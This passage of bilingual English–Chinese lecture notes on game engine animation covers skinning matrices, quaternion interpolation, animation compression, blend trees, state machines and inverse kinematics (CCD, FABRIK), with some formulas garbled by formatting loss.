      $V^l_b$ :$V$ 在绑定姿势局部空间中的位置

    • $M^m_{b(j)}$: $J$'s pose in model space within bind pose

      $M^m_{b(j)}$:$J$ 在模型空间中的绑定姿势内的姿势

    $V$'s position in local space at any time $t$ is fixed as

    ​$V$ 在任何时刻 $t$ 在 局部空间 中的位置固定为

    $$V’(t)\equiv V’b=(M{b(J)}m){-1}\cdot V_b^m$$


    $M^m_j(t)$: joint $J$'s pose in model space at time $t$

    ​$M^m_j(t)$:$J$ 在 $t$ 时刻在模型空间中的姿势

    $$M_jm(t)=\prod_{j=J}0M’_{p(j)}(t)$$

    $V^m(t)$: $V$'s position in model space at time $t$

    ​$V^m(t)$:$V$ 在 $t$ 时刻在模型空间中的位置

    $$Vm(t)=M_jm(t)\cdot V_j1=M_jm(t)\cdot(M_{b(J)}m){-1}\cdot V_b^m$$

    • $M_jm(t)\cdot(M_{b(J)}m)^{-1}$: Inverse Bind Pose Matrix

    Skinning Matrix:

    $$K_j=M_jm(t)\cdot(M_{b(J)}m)^{-1}$$

    Representing a Skeleton in Memory

    ​代表内存中的骨骼

    • The name of the joint, either as a string or a hashed 32-bit string id

      关节的名称,可以是字符串,也可以是散列的 32 位字符串 ID

    • The index of the joint’s parent within the skeleton

      骨骼中关节父级的索引

    • The inverse bind pose transform is the inverse of the product of the translation, rotation and scale

      逆绑定姿势变换是平移、旋转和缩放乘积的逆

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    struct Joint {
    const string m_joint name; // the name of joint
    UInt8m_parent_joint_index; // the index of parent joint or 0xFF if root
    Translation m_bind_pose_translation; // bind pose:translation
    Rotation m_bind_pose_rotation; // bind pose:scale
    Matrix4X3m_inverse_bind_pose_transform; // inverse bind pose 可以通过计算得到,不过为了节省时间,事先算好
    }

    struct Skeleton {
    UInt m_joint_count; // number of iointsm joints
    Joint m_joints[]; // array of joints
    };

    Skinning Matrix Palette

    ​蒙皮矩阵调色板

    An array of skinning matrices for each joint

    ​每个关节的蒙皮矩阵数组

    • To be used by GPU in shaders

      由 GPU 在着色器中使用

    • Optimization: count the transform matrix $M^W$ for model space to world space

      优化:计算 模型空间 到世界空间的变换矩阵 $M^W$

      The optimized skinning matrix of joint $J$ is

      关节 $J$ 的优化蒙皮矩阵

    $$K’_j=M^w\cdot M_jm(t)\cdot(M_{b(J)}m)^{-1}$$

    Weighted Skinning with Multi-joints

    ​多关节加权蒙皮

    webp

    For a mesh vertex $V$ which is bound to $N$ joints

    ​对于绑定到 $N$ 关节的网格顶点 $V$

    • $W_i$: the Skinning Weight of the $i$-th bound joint

      $W_i$:第 $i$ 个绑定关节的蒙皮权重

    Weighted Skinning Blend

    ​加权蒙皮混合

    webp

    For a vertex $V$ which is bound to $N$ joints $J_0$ to $J_{N-1}$

    ​对于绑定到 $N$ 关节 $J_0$ 到 $J_{N-1}$ 的顶点 $V$

    • $K_{j_{i}}(t)$: the skinning matrix of joint $J_i$ at time $t$

      $K_{j_{i}}(t)$:关节 $J_i$ 在时间 $t$ 的蒙皮矩阵

    Transform $V$'s position in joint $J$'s local space to model space:

    ​将 $V$ 在关节 $J$ 的 局部空间 中的位置转换为 模型空间

    $$V_{J_i}^m(t)=K_{J_i}(t)\cdot V_{b(J_i)}^m$$

    $V$'s position in model space:

    ​$V$ 在模型空间中的位置:

    $$Vm(t)=\sum_{i=0}{N-1}W_i\cdot V_{j_i}^m(t)$$

    Clip

    webp

    A sequence of skeleton poses

    ​一系列骨骼姿势

    Interpolation between Poses

    ​姿势之间的插值

    webp

    • Animation’s timeline is continuous

      动画的时间线是连续的

    Interpolation

    ​插值

    webp

    • Calculate the pose between key poses

      计算关键姿势之间的姿势

    Simple lnterpolation of Translation and Scale

    ​平移和比例的简单插值

    • Linear interpolation (LERP)

      线性插值(LERP)

      $f(x)=(1-\alpha)f(x_1)+\alpha f(x_2)$

      $\alpha=\frac{x-x_1}{x_2-x_1},x_1<x_2,x\in[x_1,x_2]$

    webp

    Translation:

    $$T(t)=(1-\alpha)T(t_1)+\alpha T(t_2)$$

    Scale:

    $$S(t)=(1-\alpha)S(t_1)+\alpha S(t_2)$$

    Quaternion interpolation of Rotation

    ​旋转的四元数插值

    webp

    • NLERP for quaternion

      四元数的 NLERP

      • Liner interpolation

        线性插值

        $q_t=\mathrm{Lerp}(q_{t1},q_{t2},t)=(1-\alpha)q_{t1}+\alpha q_{t2}$

        $a=\frac{t-t_1}{t_2-t_1},t_1<t_2,t\in[t_1,t_2]$

      • Normalization

        归一化

        $q_t’=\mathrm{Nlerp}(q_{t1},q_{t2},t)=\frac{(1-\alpha)q_{t1}+\alpha q_{t2}}{||(1-\alpha)q_{t1}+\alpha q_{t2}||}$

    Shortest Path Fixing of NLERP

    • The shortest path

    webp

    $$q_t=\begin{cases}\frac{(1-\alpha)q_{t1}+\alpha q_{t2}}{||(1-\alpha)q_{t1}+\alpha q_{t2}||}&q_{t1}\cdot q_{t2}\geq0\\frac{(1-\alpha)q_{t1}-\alpha q_{t2}}{||(1-\alpha)q_{t1}-\alpha q_{t2}||}&q_{t1}\cdot q_{t2}<0\end{cases}$$

    $$\begin{aligned}&q_{t1}=a+bi+cj+dk\&q_{t2}=e+fi+gj+hk\end{aligned}$$

    解得:

    $$\begin{aligned}
    q_{t1}\cdot q_{t2}& =ae+bf+cg+dh \
    &=\cos(\theta)||q_{t1}|||||q_{t2}||
    \end{aligned}$$

    webp

    Problem of NLERP

    webp

    Non-constant angular speed of NLERP

    ​NLERP 非恒定角速度

    SLERP: Uniform Rotation Interpolation

    ​SLERP:均匀旋转插值

    webp

    SLERP for quaternion

    ​四元数的 SLERP

    $$\begin{aligned}&q_t=\mathrm{Sler}p(q_{t1},q_{t2},t)=\frac{\sin\left((1-t)\theta\right)}{\sin\left(\theta\right)}\cdot q_{t1}+\frac{\sin\left(t\theta\right)}{\sin\left(\theta\right)}\cdot q_{t2}\&\theta=\arccos(q_{t1}\cdot q_{t2})\end{aligned}$$

    ​用到了反三角函数,计算速度慢。

    NLERP vs. SLERP

    webp

    • NLERP

      • Non-constant angular speed

        非恒定角速度

      • Almost constant angular speed when $\theta$ is small

        当 $\theta$ 很小时,角速度几乎恒定

    • SLERP

      • Constant angular speed

        恒定角速度

      • May have zero-divide problem when $\theta$ is small

        当 $\theta$ 很小时可能会出现零除问题

    • Combination

      • Widely used in 3A-game development

        广泛应用于 3A 游戏开发

      • Use SLERP when $\theta$ is large, and NLERP when $\theta$ is almost zero

        当 $\theta$ 很大时使用 SLERP,当 $\theta$ 几乎为零时使用 NLERP

    Simple Animation Runtime Pipeline

    webp

    ​在 CPU 计算好变换后的动作,剩下的交给 GPU。

    Animation Compression

    ​动画压缩

    Animation Clip Storage

    ​动画剪辑存储

    webp

    • Animation clip split to seperated joint pose sequences

      动画剪辑分割为单独的关节姿势序列

    • Joint pose sequence splits to seperated translation, rotation and scale tracks

      关节姿势序列分割为单独的平移、旋转和缩放轨道

    Animation Data Size

    ​动画数据大小

    • Single clip size estimation

      单个剪辑尺寸估计

    webp

    e.g. To develop a game containing over 150 unique character,like League of Legends,each of these has 30 clips with length about 5sIt takes about: 1.26~2.51GB

    ​例如开发一款包含超过 150 个独特角色的游戏,例如英雄联盟,每个游戏有 30 个长度约为 5 秒的剪辑,大约需要:1.26~2.51GB

    Distinction among Animation Tracks

    ​动画轨道的区别

    For the same joint, rotation, translation and scale changes vary greatly

    ​对于同一个关节,旋转、平移和尺度变化差别很大

    webp

    Distinction among Joints

    ​关节的区别

    webp

    The motion of different joints varies greatly

    ​不同关节的运动差异很大

    Simplest Compression -DoF Reduction

    ​最简单的压缩 - 自由度缩减(一般骨骼动画只有关节的旋转)

    • Scale

      缩放

      • Discard scale track (Usually not changed in humanoid skeleton except facial joints)

        丢弃比例轨迹(除面部关节外,人形骨骼中通常不会改变)

    • Translate

      平移

      • Discard translate track (Usually not changed in humanoid skeleton except the pelvis, facial joint and other specialolnts)

        丢弃平移轨迹(除了骨盆、面部关节和其他特殊部位外,人形骨骼中通常不改变)

    Keyframe

    webp

    A key frame (or keyframe) in animation and filmmaking is a drawing or shot that defines the starting and ending points of any smooth transition

    ​动画和电影制作中的关键帧是定义任何平滑过渡的起点和终点的绘图或镜头

    Keyframe Extraction - Linear Keys Reduction

    ​关键帧提取 - 线性关键点缩减

    webp

    ​Remove those frames which can be fitted by linear interpolation of adjacent frames

    ​删除那些可以通过相邻帧线性插值拟合的帧

    1
    2
    3
    4
    5
    6
    7
    8
    KeyFrame = {}
    for i = 1 to n-1 do
    frame_interp = Lerp(frame[i-1],frame[i+1])
    error = Diff(frame[i],frame_interp)
    if isNotAcceptable(error) then
    KeyFrame.insert(frame[i])
    end
    end

    Catmul-Rom Spline

    ​Catmul-Rom 样条线(有损压缩)

    webp

    Four control points $P_0$, $P_1$, $P_2$, $P_3$, will make a curve from $P_1$ to $P_2$

    ​四个控制点 $P_0$、$P_1$、$P_2$、$P_3$ 将形成一条从 $P_1$ 到 $P_2$ 的曲线

    • $\alpha$ : affects how sharply the curve bends at control points (usually $\alpha=0.5$)

      $\alpha$:影响曲线在控制点处的弯曲程度(通常$\alpha=0.5$)

    • $t$: the interpolation coefficient

      $t$:插值系数

    Interpolate on the curve with $t$ in range $(0,1)$

    ​在曲线上使用 $t$ 在 $(0,1)$ 范围内进行插值

    $$P(t)=[1\quad t\quad t^2\quad t^3]\begin{bmatrix}0&1&0&0\-\alpha&0&\alpha&0\2\alpha&\alpha-3&3-2\alpha&-\alpha\-\alpha&2-\alpha&\alpha-2&\alpha\end{bmatrix}\begin{bmatrix}P_0\P_1\P_2\P_3\end{bmatrix}$$

    webp

    Fitting Process

    • Make a Catmull-Rom spline with the middle 2 control points at both ends of the original curve

      制作一条 Catmull-Rom 样条线,中间 2 个控制点位于原始曲线的两端

    • lteratively add control points like binary search

      交替添加控制点,如二分搜索

    • Calculate inner curve by the most closet 4 points

      通过最接近的 4 个点计算内曲线

    • Repeat until the error of each frame is under the threshold

      重复直到每帧的误差低于阈值

    Float Quantization

    Use less bits integer to represent limited range and accuracy float value

    ​使用较少位的整数来表示有限范围和精度的浮点值

    $$DesiredBits=[log_2\frac{Range}{Accuracy}]$$

    Example Translation Range $[0, 10]$, Accuracy 0.001m:

    ​示例变换范围 $[0, 10]$,精度 0.001m:

    $$DesiredBits=\lceil\log_2\frac{10}{0.001}\rceil=14bits$$

    In general, 16 bits can cover pose’s float range and accuracy requirements in the game engine

    ​一般来说,16 位可以覆盖游戏引擎中 pose 的浮动范围和精度要求

    Example of linear quantizing a 32bit float to a 16bit unsigned integer.

    ​将 32 位浮点数线性量化为 16 位无符号整数的示例

    webp

    Quaternion Quantization

    ​四元数量化

    • 3 numbers is enough to represent a unit quaternion like $q= (a,b,c, 1- (a^2+ b^2 + c^2))$

      3 个数字足以表示一个单位四元数,例如 $q= (a,b,c, 1- (a^2+ b^2 + c^2))$

    • The range of the rest 3 numbers could be limited in $\left[-\frac{1}{\sqrt2}, \frac{1}{\sqrt2}\right]$ , if always omitingthe number with largest absolute value

      其余 3 个数字的范围可以限制在 $\left[-\frac{1}{\sqrt2}, \frac{1}{\sqrt2}\right]$ 中,如果总是省略绝对值最大的数字

    $$a2+b2+c2+d2=1,|a|\geq\max(|b|,|c|,|d|)$$

    $$2b2<a2+b2<a2+b2+c2+d^2=1$$

    $$b^2\leq\frac12\Rightarrow-\frac1{\sqrt2}\leq b\leq\frac1{\sqrt2}$$

    Similarly 类似地, $-\frac1{\sqrt{2}}\leq c\leq\frac1{\sqrt{2}}$ and $-\frac1{\sqrt{2}}\leq d\leq\frac1{\sqrt{2}}$

    webp

    • Use 2 bits to represent which number is discard

      使用 2 位来表示哪个数字被丢弃

    • Use 15 bits storage for each number, ranged in $\left[-\frac{1}{\sqrt2},\frac{1}{\sqrt2}\right]$, precision $\sqrt2/32767≈0.000043$

      每个数字使用 15 位存储,范围为$\left[-\frac{1}{\sqrt2},\frac{1}{\sqrt2}\right]$,精度$\sqrt2/32767≈0.000043$

    • Finally a quaternion could store in a 48 bits storage, cutting down from 128 bits

      最终四元数可以存储在 48 位存储器中,从 128 位减少

    Size Reduction from Quantization

    ​量化的尺寸减小

    webp

    • The key point of quantization is to find a proper error threshould, and use as less bits of storage as possible

      量化的关键是找到合适的误差阈值,并使用尽可能少的存储位

    • Keyframe and quantization can use together to obtain a better compression ratio

      关键帧和量化可以一起使用以获得更好的压缩比

    Error Propagation

    ​错误传播

    webp

    Error cuased by compression of animation data will accumulate between bones

    ​动画数据压缩引起的误差会在骨骼之间累积

    • Bones store local space transformation data

      骨骼存储局部空间变换数据

    • Bones are organized by hierachy

      骨骼按层次结构组织

    Joint Sensitivity to Error

    ​联合错误敏感性

    Some special parts require high precision animation.

    ​一些特殊零件需要高精度的动画。

    webp

    ​由动画有损压缩导致的动画错误。

    Measuring Accuracy - Data Error

    ​测量精度 - 数据错误

    webp

    Calculate the error with the diff between the interpolated transform data and the origin

    ​计算插值变换数据与原点之间的差异的误差

    • Translation Error: $||T_1-T_2||$
    • Rotation Error: $||R_1-R_2||$
    • Scale Error: $||S_1-S_2||$

    Measuring Accuracy - Visual Error

    ​测量精度 - 视觉误差

    webp

    Calculate the error with the diff betweent the interpolated vertex and the desired vertex

    ​计算插值顶点与所需顶点之间的差异的误差

    webp

    Hard to cacluate the visual error of every vertex

    ​很难计算每个顶点的视觉误差

    • Great amount of calculation

      计算量大

    Estimate the visual error

    ​估计视觉误差

    • Fake vertex: Two orthogonal virtual vertices at a fixed distance from the joint (not co-linear with the joint rotation axis)

      假顶点:距关节固定距离的两个正交虚拟顶点(与关节旋转轴不共线)

    • Fake Vertex Distance Approximation

      假顶点距离近似

      • character bones 2~10cm

        人物骨头 2~10 厘米

      • large animated objects 1~10m

        大型动画物体 1~10m

    Error Compensation - Adaptive Error Margins

    ​误差补偿 - 自适应误差裕度

    webp

    • Adaptive Error Margins

      自适应误差容限

      • Use different accuracy threshold for different joint from end to root, in order to reduce error caused by parent joint

        对从头到尾的不同关节使用不同的精度阈值,以减少父关节引起的误差

    Error Compensation - in Place Correction

    ​误差补偿 - 就地校正

    webp

    • Process

      过程

      • Select a point on every bone except root

        在除根部之外的每个骨骼上选择一个点

      • Compute the rotation of every compressed bone from root that takes the tagged point closet to its actual position in model space

        计算从根部开始的每个压缩骨骼的旋转,使标记点最接近其在模型空间中的实际位置

      • Add the rotation to transform of compressed data

        添加旋转来转换压缩数据

    • Pros

      优点

      • No Overhead during decompression period since all data already computed during compression

        解压期间没有开销,因为所有数据已在压缩期间计算

    • Cons

      缺点

      • May produce memory overhead because of possible modification to ConstantTrack

        由于可能对 ConstantTrack 进行修改,可能会产生内存开销

      • May produce NoiseTrack because it directly changes keyframe data

        可能会产生 NoiseTrack,因为它直接更改关键帧数据

      • Compression may cost more time

        压缩可能会花费更多时间

    Animation DCC Process

    In general, the Animation DcC (Digital Content Creating) process includes:

    ​一般来说,动画 DcC(数字内容创建)过程包括:

    • Mesh

      网格

    • Skeleton binding

      骨骼绑定

    • Skinning

      蒙皮

    • Animation creation

      制作动画

    • Exporting

      输出

    Mesh building

    webp

    • Blockout Stage: Create a rough outline of the character

      草图阶段:创建角色的粗略轮廓

    • High Poly Stage: improve the building precision

      高多边形阶段:提高模型精度

    • Low Poly Stage: Divide the surface into meshes

      低多边形阶段:将表面划分为网格

    • Texture Stage: Add texture to character

      纹理阶段:为角色添加纹理

    Mesh Adjustment for Animation

    ​动画的网格调整

    webp

    • Mesh dividing is vital for animation creating, it defines how the skin curves

      网格划分对于动画创建至关重要,它定义了皮肤的弯曲方式

    • Animation turns to be weird if the meshes are too sparse

      如果网格太稀疏,动画会变得很奇怪

    • Dense meshes cause a performance overhead

      密集的网格会导致性能开销

    Exporting

    webp

    • FBX file
      • Model mesh
      • skeleton
      • skinning data
      • animation clip

    FBX: the industry-standard 3D asset exchange file format for games. lt isdeveloped by Autodesk as a proprietary format.

    ​FBX:游戏的行业标准 3D 资产交换文件格式。它是由 Autodesk 开发的专有格式。

    第九节:高级动画技术:动画树、IK 和表情动画

    Animation System

    Advanced Animation Technology

    ​高级动画技术

    How to Achieve the Animation Effect in Real Game?

    ​如何实现真实游戏中的动画效果?

    webp

    ​将动画师制作的各种 simple animation clips 混合成 complex animations。

    Animation Blending

    • The term animation blending refers to any technique that allows more than one animation clip to contribute to the final pose of the character

      术语“动画混合”是指允许多个动画剪辑为角色的最终姿势做出贡献的任何技术

    Case: Walking to Running

    webp

    • Assume the character walks at 1.5m/s and runs at 3.0m/s in our game

      假设角色在我们的游戏中以 1.5m/s 的速度行走并以 3.0m/s 的速度奔跑

    • As the character’s speed increase, we want to switch its animation from walking to running

      随着角色速度的增加,我们希望将其动画从步行切换为跑步

    Math of Blending: LERP

    webp

    Use LERP to get intermediate frame from poses of different clips

    ​使用 LERP 从不同剪辑的姿势中获取中间帧

    Weight is controlled by game parameters, i.e, character speed

    ​重量由游戏参数控制,即角色速度

    Calculate Blend Weight

    ​计算混合权重(依据速度)

    参数描述
    $\text{speed}_{\text{current}}$current speed
    $\text{speed}_{\text{1}}$speed of clip1
    $\text{speed}_{\text{2}}$speed of clip2
    $\text{weight}_1$calculated weight of clip1
    $\text{weight}_2$calculated weight of clip2

    $$weight_1=\frac{speed_{current}-speed_2}{speed_1-speed_2}$$

    $$\mathrm{weight}2=\frac{\mathrm{speed}{current}-\mathrm{speed}_1}{\mathrm{speed}_2-\mathrm{speed}_1}$$

    Align Blend Timeline

    ​对齐混合时间线

    webp

    Case: Walking to Running

    In order to achieve the desired effect, we need a lot of animation clips with intermediate speeds.

    ​为了达到想要的效果,我们需要大量中等速度的动画片段。

    Let the animators produce a whole bunch?

    ​让动画师制作一大堆?(这是不可能的)

    Blend Space

    ​混合空间

    1D Blend Space: Directional Movement

    ​一维混合空间:定向运动

    webp

    Players can move forward from multiple angles

    ​玩家可以从多个角度前进

    We can blend any angle from three clips:

    ​我们可以混合三个剪辑中的任意角度:

    • Strafe Left clip
    • Run Forward clip
    • Strafe Right clip

    The technique is called 1D Blend Space.

    ​该技术称为一维混合空间。

    Directional Walking and Running

    ​定向步行和跑步

    webp

    Players can change direction and speed at the same time

    ​玩家可以同时改变方向和速度

    We simply place the two 1D Blend Spaces orthogonally and we get an 2D Blend Space

    ​我们只需将两个一维混合空间正交放置,就得到一个二维混合空间

    2D Blend Space

    webp

    Since the movement speed in the lateral direction is lower in the forward direction, the character should enter the running state in a lower speed in the lateral direction

    ​由于横向移动速度在前进方向上较低,因此角色应该以较低的横向速度进入奔跑状态

    Case: Applauding on Different Poses

    ​案例:不同姿势鼓掌

    webp

    There are multiple robots in different poses in the scene

    ​场景中有多个机器人摆出不同的姿势

    We need to make applause animations for various poses separately

    ​我们需要分别为各种姿势制作掌声动画

    Is it possible to make a single applauding animation that can be applied to all poses?

    ​是否可以制作一个可以应用于所有姿势的鼓掌动画?

    Skeleton Masked Blending

    ​骨架蒙版混合

    webp

    The set of all blend percentages for the entire skeleton ${\beta_j}|^{N-1}_{j=0}$ is sometimes called a blend mask $b$

    ​整个骨架的所有混合百分比的集合 ${\beta_j}|^{N-1}_{j=0}$ 有时称为混合蒙版 $b$

    Case: Warm Welcome from the Robots

    ​案例:机器人的热烈欢迎

    webp

    We will let robots applauding in different poses

    ​我们会让机器人以不同的姿势鼓掌(用蒙版结合两个动画 clips)

    Additive Blending

    webp

    Add a difference clip into a regular clip to produce a new clip

    ​将差异剪辑添加到常规剪辑中以生成新剪辑

    Additive Blending introduces a new kind of animation called a difference clip, which represents the difference between two regular animation clips.

    ​添加剂混合引入了一种称为差异剪辑的新型动画,它表示两个常规动画剪辑之间的差异。

    A difference clip can be added into a regular animation clip in order to produce interesting variations in thepose and movement of the character.

    ​可以将差异剪辑添加到常规动画剪辑中,以便在角色的姿势和运动中产生有趣的变化。

    Nodding to Camera

    webp

    ​朝向摄像机点头的动画。

    Additive Blending - Abnormal Bone Results

    ​添加剂混合 - 骨骼结果异常

    webp

    Additive blends are more likely to have abnormal bone results

    ​添加剂混合物更有可能产生异常的骨骼结果

    Animation Blending Summary

    ​动画混合总结

    webp

    • 1D Blend Space

      一维混合空间

      • Blend poses based on a single input value

        基于单个输入值混合姿势

    • 2D Blend space

      • Blend poses based on two input values

        基于两个输入值混合姿势

      • Triangular blend

        三角形混合

    • Masked Blending

      蒙版混合

    • Additive Blending

      添加剂混合

    Action State Machine (ASM)

    ​有限动画状态机

    Case: Jumping

    webp

    How to animate jump?

    ​如何制作跳跃动画?

    Blend Space is synchronous, but jump is stateful

    ​混合空间是同步的,但跳跃是有状态的

    We usually model the jumping action via a finite state machine, commonly known as the Action State Machine (ASM)

    ​我们通常通过有限状态机(通常称为动作状态机(ASM))来模拟跳跃动作

    ASM Definition

    ​ASM 定义

    webp

    • ASM consists of nodes and transitions

      ASM 由节点和转换组成

    • Node types

      节点类型

      • Blend space

        混合空间

      • Clip

        片段

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    class ActionstateMachineclipNode
    {
    Animationclip m_clip;
    bool m_is_loop;
    };

    class ActionstateMachineBlendSpaceNode
    {
    Blendspace m_blend_space;
    bool m_is_loop;
    };
    • Transition type

      过渡型

      • simply “pop" from one state to another

        只需从一种状态“弹出”到另一种状态

      • cross-fade from one state to the next

        从一种状态交叉淡入淡出到另一种状态

      • Special transitional states

        特殊过渡状态

    Cross Fades

    ​交叉淡入淡出

    webp

    Two common ways

    ​两种常见方式

    • Smooth transition

      平稳过渡

      • restriction: the two clips must be looping animations, and their timelines must be synchronized

        限制:两个剪辑必须是循环动画,并且它们的时间线必须同步

    • Frozen transition

      冻结过渡

    Cross Fades Curve

    webp

    Different cross fades curve could be used for different demands

    ​不同的交叉淡入淡出曲线可用于不同的需求

    Animation State Machine in Unreal

    ​虚幻中的动画状态机

    webp

    • State: a blueprint graph which outputs a pose

      状态:输出姿势的蓝图

    • Transition : control when to change state and how to blend (Multi)

      过渡:控制何时改变状态以及如何混合(多)

    Layered ASM

    ​分层状态机

    webp

    different parts of a character’s body to be doing different, independent or semi-independent actions simultaneously

    ​角色身体的不同部位同时做不同的、独立或半独立的动作

    Animation Blend Tree

    ​现代游戏引擎常用的方法——动画混合树

    Blend Tree

    ​混合树

    webp

    Structure layered ASMs and operations as a tree

    ​将分层 ASM 和操作构建为树

    • Inspired by expression tree

      受到表达式树的启发

    • Easy to understand for animators

      动画师易于理解

    For a blend tree

    ​对于混合树

    • Non-terminal nodes and terminal nodes (leaf nodes)

      非终端节点和终端节点(叶节点)

    • The result of each non-terminal node is a pose

      每个非终端节点的结果是一个位姿

    LERP Blend Node

    ​LERP 混合节点

    webp

    • Binary LERP node

      二进制 LERP 节点

      • Basic non-terminal node in blend tree

        混合树中的基本非终端节点

      • LERP two input poses with weight $\beta$ into one output pose

        LERP 将权重 $\beta$ 的两个输入姿势转化为一个输出姿势

    Usually extended to handle multiple inputs(e.g. Ternary/Quad LERP node)

    ​通常扩展为处理多个输入(例如三元/四元 LERP 节点)

    Additive Blend Node

    ​加法混合节点

    webp

    • Basic non-ternimal node in blend tree

      混合树中的基本非终止节点

    • Add the second input pose (usually a difference one) into the first input pose by weight $\beta$

      按权重 $\beta$ 将第二个输入姿势(通常是差异姿势)添加到第一个输入姿势中

    Express Layered ASM in Blend Tree

    ​在混合树中表达分层 ASM

    webp

    Use a blend tree to describe the desired final pose of ASMs

    ​使用混合树来描述 ASM 所需的最终姿态

    Blend Tree Nodes

    ​混合树节点

    webp

    Terminal node (Leaf Nodes)

    ​终端节点(叶节点)

    • Clip
    • Blend Space
    • ASM

    Non-terminal node (No-Leaf Nodes)

    ​非终端节点(No-Leaf Nodes)

    • Binary LERP blend node

      二进制 LERP 混合节点

    • Ternary (triangular) LERP blend node

      三元(三角形)LERP 混合节点

    • Binary additive blend node

      二元加法混合节点

    Unreal Animation Blueprint

    ​虚幻动画蓝图

    webp

    A blueprint graph which outputs a final pose

    ​输出最终姿势的蓝图

    • Take clip poses or the results of ASMs as input

      将剪辑姿势或 ASM 结果作为输入

    • Blend input poses by different methods

      通过不同的方法混合输入姿势

    Bend Tree Control Parameters

    ​弯曲树控制参数

    • node search

      节点搜索

      provide a way for higher-level code to find blend nodes in the tree

      为高层代码提供一种在树中查找混合节点的方法

    • named variable

      命名变量

      allow names to be assigned to the individual control parameters. The controlling code can look up a control parameter by name in order to adjust its value

      允许为各个控制参数分配名称。控制代码可以通过名称查找控制参数以调整其值

    • control structure

      控制结构

      a simple data structure, contains all of the control parameters for the entire character. The nodes in the blend tree(s) are connected to particular control parameters

      一个简单的数据结构,包含整个角色的所有控制参数。混合树中的节点连接到特定的控制参数

    Animation blend tree is way more complicated that those classic notes (i,e, event nodes, calculation/logic nodes and special blending and flow control nodes)

    ​动画混合树比那些经典注释(即事件节点、计算/逻辑节点以及特殊混合和流程控制节点)要复杂得多。

    Unreal Animation Blueprint Control

    ​虚幻动画蓝图控制

    webp

    Named variables as members in animation blueprint

    ​命名变量作为动画蓝图中的成员

    • Can be updated through blueprint

      可以通过蓝图进行更新

    • Can be used anywhere inside the Blend Tree

      可以在混合树内的任何地方使用

    Unreal5 Animation Tree Sample

    webp

    Inverse Kinematices (IK)

    ​逆运动学 (IK)

    Basic Comcepts

    webp

    • End-effector

      末端执行器

      The bone which is expected to be movedto a desired position

      预计将移动到所需位置的骨骼

    • lK (inverse kinematics)

      lK(逆运动学)

      The use of kinematic equations to determine the joint parameters of a manipulator so that the end-effector moves to a desired position

      利用运动学方程确定机械手的关节参数,使末端执行器移动到所需位置

    • FK (Forward Kinematics)

      FK(正向运动学)

      The use of the kinematics equations of a robot to compute the position of the end-effectors from specified values for the joint parameters

      使用机器人的运动学方程根据关节参数的指定值计算末端执行器的位置

    How to Touch the Ground?

    webp

    ​让角色踏入凹凸不平的地面时,脚能正确踏在地面上。

    Intuitive ldea: Adjust Feet Position for Each Step

    ​直观想法:每一步调整脚的位置

    Two Bones IK

    webp

    ​在脚和低面建立 IK 约束。

    • 3D space

    webp

    • Determine the final pose by a reference vector

      通过参考向量确定最终姿态

    webp

    More Complicated IK Scenarios

    ​更复杂的 IK 场景

    webp

    Complexity of Multi-Joint lK Solving

    ​多关节 lK 求解的复杂性

    webp

    • Computation cost: high dimension non-linear function solving in real-time

      计算成本:实时求解高维非线性函数

    • May have multiple solutions, unique solution or nosolution

      可能有多种解决方案、唯一解决方案或无解决方案

    Check Reachability of the Target

    ​检查目标的可达性

    webp

    Constraints of Joints

    webp

    ​人体的关节有多种,不同的关节能做出不同范围的变换。

    ​哦!游戏引擎开发者还要对解剖学有所涉猎。

    Need Treat Constraints Seriously

    ​需要认真对待约束

    webp

    ​约束不充分,游戏中出现反关节运动。

    Heuristics Algorithm

    ​启发式算法

    Why

    • Too many joints + constraints, difficult to solve with analysis method

      关节 + 约束过多,难以用分析方法解决

    Basic ldea

    ​基本思想

    Designed to solve problem in faster and more efficient fashion by sacrificing optimality, accuracy, precision, or completeness for speed

    ​旨在通过牺牲最优性、准确性、精密度或完整性来换取速度,以更快、更高效的方式解决问题

    • Approximation

      近似值

    • Global optimality is not guaranteed

      不保证全局最优

    • lteration is usually used with a maximum limit

      迭代通常使用最大限制

    CCD (Cyclic Coordinate Decent)

    ​CCD(循环坐标系)

    Principle

    • From joint-to-joint, rotates the end-effector as close as possible to the target, solves lK problem in orientation space

      从关节到关节,旋转末端执行器尽可能靠近目标,解决方向空间中的 lK 问题

    Reachability

    ​可达性

    • Algorithm can stop after certain number of iterations to avoid unreachable target problem

      算法可以在一定次数的迭代后停止,以避免无法达到目标的问题

    Contraints

    ​限制条件

    • Angular limits is allowed, by checking after each iteration

      通过在每次迭代后检查,允许角度限制

    Optimized CCD (1/2)

    ​优化 CCD (1/2)

    webp

    Add tolerance regions to each bone’s goal

    ​为每个骨骼的目标添加容差区域

    • Each bone stops rotating and moves onto the next bone within tolerance region

      每个骨骼停止旋转并移动到公差范围内的下一个骨骼

    • Helps to produce poses that are less rigid and more comfortable looking

      有助于塑造不那么僵硬且看起来更舒适的姿势

    Optimized CCD (2/2)

    webp

    Use under-damped angle scaling

    ​使用欠阻尼角度缩放

    • Each ioint moves only a small amount toward the goal and distributes the movement across multiple bones

      每个关节仅向目标移动少量,并将移动分布到多个骨骼上

    • Produce less abrupt joint changes and more smooth and casual poses for character movement

      减少突然的关节变化,并为角色运动提供更平滑和随意的姿势

    FABRlK (Forward And Backward Reaching Inverse kinematics)

    ​FABRlK(向前和向后到达逆运动学)

    webp

    Principle

    ​原则

    • Instead of orientation space, solves lK problem in position space

      代替方向空间,解决位置空间中的 lK 问题

    Reachability

    ​可达性

    • Algorithm can stop after certain number of iterations to avoid unreachable target problem

      算法可以在一定次数的迭代后停止,以避免无法达到目标的问题

    FABRIKF with constraints

    ​有约束的 FABRIKF

    webp

    Re-positioning

    ​重新定位

    • Joint restrictions can be enforced at each step by taking the resultant orientation and forcing it to stay with in the valid range

      可以通过采用最终的方向并迫使其保持在有效范围内,在每一步中强制执行联合限制

    Multiple End-Effectors

    ​多个末端执行器

    webp

    • May result in conflict between goals, which can not be achieved simultaneously

      可能导致目标之间发生冲突,无法同时实现

    • May use a priority or a weighted approach

      可以使用优先级或加权方法

    IK with Multiple End-Effectors

    ​具有多个末端执行器的 IK

    webp

    If a shared bone needs to be moved, the end-effector that is updated last will get priority and the other bones will be pulled away

    ​如果需要移动共享骨骼,则最后更新的末端执行器将优先,其他骨骼将被拉走

    Jacobian Matrix

    ​雅可比矩阵

    webp

    In vector calculus, the Jacobian Matrix of a vector-valued function of severavariables is the matrix of all its first-order partial derivatives

    ​在向量微积分中,多个变量向量值函数的雅可比矩阵是其所有一阶偏导数的矩阵。

